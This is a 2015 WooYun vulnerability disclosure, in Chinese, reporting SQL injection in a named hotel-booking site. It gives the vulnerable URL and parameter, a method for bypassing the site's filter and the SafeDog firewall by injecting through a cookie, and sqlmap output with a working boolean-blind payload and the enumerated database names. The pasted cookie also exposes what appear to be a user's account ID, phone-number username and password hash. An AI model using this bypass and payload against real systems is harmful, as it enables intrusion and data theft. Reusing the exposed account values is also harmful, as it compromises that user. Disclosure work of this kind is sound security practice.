看我如何绕过多重防注入进行住哪网注入

漏洞概要

缺陷编号:WooYun-2015-0104327

漏洞标题:看我如何绕过多重防注入进行住哪网注入

相关厂商:住哪网

漏洞作者:greg.wu

提交时间:2015-03-28 10:09

公开时间:2015-05-13 14:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

Tags标签:

漏洞详情

披露状态:

2015-03-28: 细节已通知厂商并且等待厂商处理中
2015-03-29: 厂商已经确认,细节仅向厂商公开
2015-04-08: 细节向核心白帽子及相关领域专家公开
2015-04-18: 细节向普通白帽子公开
2015-04-28: 细节向实习白帽子公开
2015-05-13: 细节向公众公开

简要描述:

绕过程序本身的代码防注入和安全狗

详细说明:

问题站点:union.zhuna.cn注入点:http://union.zhuna.cn/user/ajaxarea.asp?Id=6&TypeID=CityID参数id,mssql数字型注入经过测试,网站自身程序有防注入功能,输入单引号 and or 等关键字会报错,如下图

因为是asp程序,考虑将get请求转变为post请求以绕过防注入,发现是可行的,但问题又来了,该站还安装了安全狗

继续测试,猜测asp代码里应该是gpc都能接收参数的,于是将存在注入的参数放到cookie里面,再将等于号换成like,终于完美绕过多重防注入!

漏洞证明:

放到sqlmap里跑,毫无压力sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: Cookie #1* ((custom) HEADER)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: ASPSESSIONIDAQBDRBCS=LBCFGGDCJJDNBFBKAFJLDJAO; S0Oz_20eb_saltkey=dpzTu77i; S0Oz_20eb_lastvisit=1427459395; S0Oz_20eb_sid=x711zC; pgv_pvi=6822079425; pgv_info=ssi=s1363428688; Referer=http://union.zhuna.cn/; login=login; ZhuNaUserName=15017512337; ZhuNaUserID=7170608; ZhuNaPassWord=ea3f2951e30f0584; S0Oz_20eb_lastact=1427466253 api.php js; safedog-flow-item=073B67548420D14D0CC822F81DD5EA5E; tjid=; webname=baiii; sxid=; AJSTAT_ok_pages=21; AJSTAT_ok_times=1; Id=6 ) AND 4752=4752 AND (2853=2853---[23:32:56] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[23:32:56] [INFO] testing Microsoft SQL Server[23:32:56] [INFO] confirming Microsoft SQL Server[23:32:56] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008[23:32:56] [INFO] fetching database names[23:32:56] [INFO] fetching number of databases[23:32:56] [INFO] resumed: 8available databases [8]:[*] global_hotel[*] hotel_9tour_cn[*] master[*] model[*] msdb[*] tempdb[*] www_zhuna_cn_jipiao[*] www_zhuna_cn_yufu2目测数据还挺多的~

修复方案:

赶紧修复吧

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-2914:17

厂商回复:

非常感谢您反馈的信息,相关问题已交技术处理。

最新状态:

暂无

评价

  1. 2010-01-01 00:00 greg.wu 白帽子 | Rank:735 漏洞数:68)

    管理同学把标题改的好中二。。。

  2. 2010-01-01 00:00 _Thorns 白帽子 | Rank:796 漏洞数:60)

    我和我的小伙伴都惊呆了。

  3. 2010-01-01 00:00 myhalo 白帽子 | Rank:241 漏洞数:22)

    骚年,怎么这么机智。

  4. 2010-01-01 00:00 圣路西法 白帽子 | Rank:0 漏洞数:0)

    骚年好猥琐啊。

  5. 2010-01-01 00:00 小博博 白帽子 | Rank:0 漏洞数:0)

    骚年 好机智

  6. 2010-01-01 00:00 http://www.wooyun.org/corps/美囤妈妈 白帽子 | Rank:0 漏洞数:0)

    新厂商入驻,欢迎各位白帽子光临!同时我们招聘安全主管,有兴趣的联系我!

  7. 2010-01-01 00:00 f4ckbaidu 白帽子 | Rank:215 漏洞数:21)

    安全狗对HPP还是无法防御吗

  8. 2010-01-01 00:00 胡小树 白帽子 | Rank:13 漏洞数:3)

    不错哦
    思路赞

  9. 2010-01-01 00:00 Keen 白帽子 | Rank:0 漏洞数:0)

    吊炸天啊

  10. 2010-01-01 00:00 Soulmk 白帽子 | Rank:20 漏洞数:1)

    好思路,学习了~~~谢谢

  11. 2010-01-01 00:00 夏殇 白帽子 | Rank:15 漏洞数:3)

    有意思